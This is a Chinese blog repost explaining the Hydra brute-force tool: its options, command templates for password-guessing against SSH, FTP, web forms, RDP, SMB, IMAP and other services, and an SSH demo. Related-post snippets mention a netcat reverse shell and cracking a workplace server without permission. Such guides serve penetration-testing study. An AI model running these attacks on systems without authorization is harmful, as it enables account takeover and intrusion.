hydra使用

于 2024-08-19 14:33:58 发布
阅读量261 收藏 8
点赞数 4
分类专栏: 工具使用 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kjssy/article/details/141324846
版权

原文链接:https://blog.csdn.net/weixin_43510203/article/details/107594228

hydra常用命令
这里我去除了字典生成部分,因为有专业的工具进行字典生成。而且hydra不适用于http(s)的破解,如果想进行http(s)的破解,请用

burpsuit进行破解。
-R 还原以前中止或崩溃的会话

-S 使用SSL连接

-s 指定非默认端口

-l 使用登录名进行登录

-L 使用账号字典进行破解

-p 使用密码进行登录

-P 使用密码字典进行破解

-e nsr n:空密码破解 s:使用的user作为密码破解 r:反向登录

-C 指定所用格式为"user:password"字典文件

-M 指定破解的目标文件,如果不是默认端口,后面跟上": port"

-o 将破解成功的用户名:密码写入指定文件

-b 指定文件类型(txt (default),json,jsonv1)

-f / -F 在找到用户名或密码时退出( -f 每个主机 -F 主机文件)

-t 设置每个目标并行连接数(默认为16)

-T 任务总体的并行连接数(默认为64)

-w /-W 设置超时时间(默认为32秒) 每个线程之间连接等待时间(默认为0)

-v / -V / -d 详细模式 / 显示login+pass 每个尝试 / 调试模式

-O 使用老版本SSL V2和V3

-q 不输出连接错误信息

-U 查看 支持破解的服务和协议

server 目标ip、某个网段

service 指定服务/协议名称

OPT 某些模块支持附加输入

hydra支持破解的服务/协议

对应功能的参数模板
1、破解ssh:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh

hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

4、post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip

http-post-form “/admin/login.php:username=USER&password=PASS&submit=login:sorry password”

(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,
5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6、破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco

hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb

9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18

12、破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

附加部分参数的含义-----来自漏洞人生http://www.vuln.cn/2528

实例演示-破解SSH密码
1.使用字典对目标服务进行破解。
hydra -L user.txt -P password.txt ssh://192.168.3.163

2.当目标服务开放的端口不是默认端口时,使用 -s 进行指定。
hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 40

3.将破解的密码存储到指定文件。
hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 40 -o ssh.txt

同理其他的服务破解也是如此,破解密码的成功关键在于字典的质量。

aliex23
关注
专栏目录
Hydra使用教程
大河之犬的博客
06-15 301
Hydra是一个暴力在线密码破解程序,一个针对系统登录密码的快速爆破工具。
hydra使用指南
weixin_54150681的博客
12-01 2359
-R 恢复先前中止/崩溃的会话 -L 指定用户名字典 -S 执行SSL连接 -s 如果服务位于不同的默认端口上,请在此处定义它,指定非默认端口 -l 使用登录名登录,或从文件加载多个登录名,指定破解的用户,对特定用户破解 -p 使用密码登录,或从文件加载多个密码 -P 指定密码字典 -x 密码暴力生成,键入“-x-h”获取帮助 -e 尝试“n”空密码,空密码试探,“s”登录通过and/or ,使用指定用户和密码试探“r”反向登录 -u 循环访问用户,而不是密码(有效!暗含-x) -...
暴力破解工具Hydra 常用命令总结
weixin_51693574的博客
11-18 1775
暴力破解工具Hydra 常用命令总结 命令: -R 修复之前使用的aborted/crashed session -S 执行SSL(Secure Socket Layer)连接 -s Port 使用非默认服务器端口而是其他端口时,指定其端口 -l Login 已经获取登录ID的情况下输入登录ID -L FILE 未获取登录ID情况下指定用于暴力破解的文件(需要指出全路径) -p Pass 已经获取登录密码的情况下输入登录密码 -P FILE 未获取登录密码的情况下指
hydra(九头蛇)暴力破解
weixin_42478365的博客
02-05 2324
暴力破解: hydra(九头蛇) 参数: -R 继续从上一次进度接着破解 -S 大写,采用SSL链接 -s 小写,可通过这个参数指定非默认端口 -l 指定破解的用户,对特定用户破解 -L 指定用户名字典 -p 小写,指定密码破解,少用,一般是采用密码字典 -P 大写,指定密码字典 -e 可选选项,n:空密码试探,s:使用指定用户和密码试探 -C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数 -M 指定目标列表文件一行一条 -o 指定结果输出文件 -f 在使用-M参数以后,找到第一对登录名或者密
Hydra(九头蛇)破解ssh密码
最新发布
nlj1860453的博客
01-11 745
准备好后,输入“hydra”验证是否存在九头蛇,如果没有报错,则输入以下代码开始破解。首先我们需要在目标主机开启ssh服务,我是kali,所以输入下面代码开启服务。其次,我们还需要一个密码字典和用户字典,用于破解密码。
Hydra爆破SSH
HAKUNAMATATATTA的博客
11-28 2027
Hydra是一款开源的暴力破解工具,支持FTP、MSSQL、MySQL、PoP3、SSH等暴力破解。
使用hydra进行SSH爆破
qq_53218512的博客
06-02 6271
mobaxterm 的功能非常全面,几乎提供了所有重要的远程网络工具(比如 SSH、X11、RDP、VNC、FTP、MOSH 等),以及 Windows 桌面上的 Unix 命令(bash、ls、cat、sed、grep、awk、rsync 等),登录之后默认开启 sftp 模式。命令的意思是:使用bin.bash里面的shell,用nc命令反弹shell,反弹到攻击机的7777端口,-e代表需要执行的指令,这里是要执行/bin/bash。发现通过计划任务执行了bash/tmp下面的task.sh文件。
hydra使用帮助手册
01-17
是用kali linux 是离不开hydra的 这是一个很强大的工具 hydra使用帮助手册(官方原版) 此手册有详细的各个参数解释说明并举例,也有所有支持的协议 等
Hydra 使用方法
liver100day的博客
06-03 6324
Hydra(爆破神器)使用方法 1.工具介绍 hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,已经集成到KaliLinux中,可以在终端直接打开 2.参数介绍 -l 指定单个用户名,适合在知道用户名爆破时使用 -L 指定多个用户名,参数值为存储用户名的文件的路径(建议使用文件绝对路径) -p 指定单个密码,适合在知道用户密码进行爆破时使用 -P 指定多个密码,参数值为存贮密码的文件(通常称为字典)的路径(建议使用文件绝对路径) -C 当用户名和密码存储到一个文件时使用
使用hydra进行SSH认证破解
Kali与编程
07-10 653
自己创建密码字典文件的方法是,根据常见密码的特征和规律,生成一些可能的密码组合,并将其保存到文本文件中。否则,系统将提示认证失败或拒绝连接。其中,-l选项指定用户名,-P选项指定密码字典文件,192.168.1.100是要破解的SSH服务的IP地址,ssh指定要使用的协议,-vV选项用于输出详细的调试信息。如果您的SSH服务器使用更复杂的用户名和密码,则需要使用更强大的用户名和密码字典文件来提高破解的成功率。需要注意的是,使用Hydra进行SSH公钥认证的破解只适用于那些允许使用公钥进行认证的SSH服务。
web-brute-using-c-in-linux:关于网络暴力攻击的示例代码。 代码是用 C 编写的,在 Linux 中工作(因为使用 linux 系统调用,例如线程、epoll 等......)
07-20
web-brute-using-c-in-linux 关于 ######关于在linux中使用c的网络暴力破解的示例代码。 代码是用 C/C++ 编写的。 使用 Linux 系统编程技巧来提高性能。 文件 TargetWeb.php : 用 php 编写的简单登录表单。 我们的目标是获取管理员密码 normal.c :C 中最简单的 Web brute。但是它太慢了。 thread.c :使用线程来提高性能。 结果非常好! epoll.c : 使用 epoll 来提高性能。 这是一个最好的选择。 epoll.c 在上下文切换方面优于 thread.c。 epoll_using_stl.cpp :几乎等同于 epoll.c ,但使用 C++ STL map 来记住 try-password。 epoll_thread.c :结合一个想法到 epoll.c 的结果,但性能比 epoll
Linux-RDP:rdp 暴力破解,端口扫描器。 非常快的扫描仪
06-22
Linux-RDP Linux RDP 扫描器和 Bruteforcer 脚本。 升级扫描仪和暴力破解。 提高了端口扫描器的速度。 1kk ip 扫描 4 分钟。
hydra笔记-利用hydra暴力破解ssh弱口令
IT1995的博客
04-28 5855
这里我搭了台虚拟机。ssh开放的22端口。用户名密码都是root。 下载windows版本的hydra GitHub - maaaaz/thc-hydra-windows at v9.1 解压就可以了 这里要自己下载一个字典,也就是这样的。这里面有很多字符串,代表密码,到时候这个软件会一个一个试。 用cmd进如目录: D:\hackSoftware\thc-hydra-windows-v9.1>hydra -l root -o 1.txt -f -P D:\hackSoftw
Hydra破解linux系统的ssh用户名密码
随 风
02-25 1596
Hydra破解ssh密码 1.1 实验环境 攻击机:kali (192.168.169.128) 靶机:centos 7 (192.168.169.133) 1.2 Hydra 参数说明 -R :继续上一次进度接着破解 1.3创建用户名字典 1.4创建密码字典 1.6开启centos 7的ssh服务 1.7使用Hydra破解 hydra -L user -P passwd 192.168.169.133 ssh -t 4 -v 1.6 尝试登陆 ...
第八天 02.hydra暴力破解ssh密码以及ftp密码
qq_56414082的博客
01-03 655
windows 打开启动FileZilla-Server0.9.43服务端。测试kali是否可以连接ftp。使用kali九头蛇开始密码爆破。
hydra对批量IP进行telnet爆破弱口令
热门推荐
gghwcf的专栏
06-21 1万+
hydra对批量IP地址进行telnet爆破,发现网上的资料都很老,没法使用,我现在hydra的版本是8.6.经测试可以正常使用的命令是:hydra -s 23 -V -l admin -p admin -t 16 -M IP地址目录 telnet...
hydra暴力破解ssh服务器密码
weixin_30539835的博客
04-25 1877
概述 我都没想到,第一次暴力破解服务器密码。竟然是对自己的单位服务器出手。。囧,因为还没来得及找测试部要来服务器登录密码,测试部负责人已经下班走了。后来又联系不上,这要更新代码,怎么办。。于是就对测试部的服务器动了歪脑筋,试验一波爆破神器hydra,本篇随笔仅供技术交流。 hydra 关于hydra的历史就不多做介绍,毕竟这么强大来头应该不小。因为也是初次使用,就来得及瞄了一眼参...
Hydra破解RDP登陆
weixin_34384915的博客
11-12 2750
Hydra破解RDP登陆 1描述 使用hydra8.1之前一直破解不了windows2003的RDP登陆密码,后来经过验证发现是版本低的原因导致的,于是升级到hydra 8.3最新版本,解决问题。 2安装hydra最新版(v8.3) 2.1卸载hydra v8.1版本 Kali 2.0默认已经安装了hydra...
hydra ssh暴力破解学习
༺墨༒眉༻
06-10 1513
文章仅用于安全防护学习 hydra hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大。在网络安全渗透过程中是一款必备的测试工具,配合社工库进行社会工程学攻击,有时会获得意想不到的效果。 (1)Debian 和 Ubuntu 安装 如果是 Debian 和 Ubuntu 发行版,源里自带 hydra,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值